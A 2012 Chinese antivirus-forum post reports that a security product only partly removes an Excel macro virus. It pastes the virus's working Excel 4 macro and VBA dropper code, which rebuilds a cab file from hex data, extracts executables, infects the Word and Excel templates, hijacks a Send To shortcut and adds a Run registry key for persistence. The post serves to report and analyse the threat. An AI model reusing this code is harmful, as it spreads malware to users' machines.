就目前我使用的情况来看,在打开带毒文件时,费尔只会提示某宏指命出错,然后要把OFFICE的宏功能关掉后才可正常显示。目前的状态是,只是防,但不会清除。
以下是具体情况:
对于中了宏病毒的EXCEL文件,会自动生成一个名为“(m1)_(m2)_(m3)”的隐藏工作表,如附图示。
图片见此链接:http://www.ftfans.org/attachment.php?aid=2255&k=aa521205db5126c2f178440809c43eab&t=1336461532&noupdate=yes
在OFFICE2003的版本中,是无法有效禁用宏。只有升级到OFFICE2007才能稍微有效的防住。
但我更希望,费尔能查出这些病毒并清理。毕竟,OFFICE2007的普及度和向下兼容性都不太好。
当我打开EXCEL的宏功能后,再打开带病毒的文件时,费尔会提示有病毒,并清除。
但经过研究发现,此时费尔清楚的只是该EXL表的宏产生病毒文件(存于C:\excel.txt),并未有效清理EXCEL中的宏命令。
以下是病毒EXCEL文件中,COPY出来的一段命令。
=FOPEN("c:\excel.txt",3)
=FOR.CELL("Counter",C1:C88,TRUE)
=FWRITELN($A$1,Counter)
=NEXT()
=FCLOSE($A$1)
=VBA.INSERT.FILE("c:\excel.txt")
=RUN("createcabfile",FALSE)
=RETURN()
-----------------------------------
同时,以上命令只是出现在A列,在B列还有很多16进制的代码。(HEX模式)
以下是C列的一些编汇语句:
Private Sub createcabfile()
Dim ch As Byte
on error resume next
Set fso = CreateObject("scripting.filesystemobject")
Set w = CreateObject("wscript.shell")
myfolder = w.specialfolders("Templates") & "\Software\"
If Not fso.folderexists(myfolder) Then
fso.createfolder myfolder
End If
For i=1 to Workbooks.Count
If Workbooks(i).name="normal.xlm" then
workbooks(i).close
fso.deletefile Application.StartupPath & "\normal.xlm"
End If
Next
For i=1 to Workbooks.Count
If Workbooks(i).name="norma1.xlm" then
goto a1
End If
Next
cabfile= "c:\cab.cab"
If Not fso.fileexists(Application.StartupPath & "\norma1.xlm") Then
fso.delete cabfile
open cabfile for binary access write as #1
For i = 1 To 150
hv = ThisWorkbook.Sheets("(m1)_(m2)_(m3)").Cells(i, 2).Value
n=1
m=instr(hv," ")
do while m>0
ch=CByte(mid(hv,n,m-n))
put #1,,ch
n=m+1
m=instr(n,hv," ")
loop
Next
close #1
w.Run "%COMSPEC% /c attrib -s -h c:\setflag.exe", 0, True
w.Run "%COMSPEC% /c attrib -s -h c:\sendto.exe", 0, True
w.Run "%COMSPEC% /c extrac32 /E /Y /L c:\ c:\cab.cab", 0, True
w.Run "%COMSPEC% /c extract /E /Y /L c:\ c:\cab.cab", 0, True
fso.deletefile cabfile
fso.copyfile "c:\normal.dot", myfolder, True
set word=createobject("word.application")
ntpath=word.NormalTemplate.Path & "\"
word.quit
fso.copyfile "c:\normal.dot", ntpath, True
fso.copyfile "c:\norma1.xlm", Application.StartupPath & "\", True
fso.copyfile "c:\internet.exe", fso.getspecialfolder(1) & "\"
set fold=fso.getfolder(w.SpecialFolders("SendTo"))
for each ff in fold.files
if instr(ff.name,"软盘")>0 then
set lnk=w.CreateShortcut(fold.path & "\" & ff.name)
lnk.TargetPath="c:\sendto.exe"
lnk.IconLocation="shell32.dll,6"
lnk.save
goto e2
end if
next
e2:
fso.deletefile "c:\normal.dot"
fso.deletefile "c:\norma1.xlm"
fso.deletefile "c:\internet.exe"
w.Run "%COMSPEC% /c attrib +s +h c:\setflag.exe", 0, True
w.Run "%COMSPEC% /c attrib +s +h c:\sendto.exe", 0, True
w.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Internet.exe","internet.exe"
w.regdelete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Internat.exe"
End If
Workbooks.Open Application.StartupPath & "\norma1.xlm"
thisworkbook.Sheets("(m1)_(m2)_(m3)").Columns(2).Copy workbooks("norma1.xlm").sheets("(m1)_(m2)_(m3)").Columns(2)
workbooks("norma1.xlm").save
fso.copyfile Application.StartupPath & "\norma1.xlm",myfolder,true
a1:
fso.deletefile "c:\excel.txt"
Application.DisplayAlerts = False
for i=1 to thisworkbook.sheets.count
if left(thisworkbook.sheets(i).name,3)="模块表" then
ThisWorkbook.Sheets(i).Delete
end if
next
Application.DisplayAlerts = True
ThisWorkbook.Saved=True
End Sub
|
发表于 2012-5-8 16:04:37
费尔打开此贴时报毒
楼主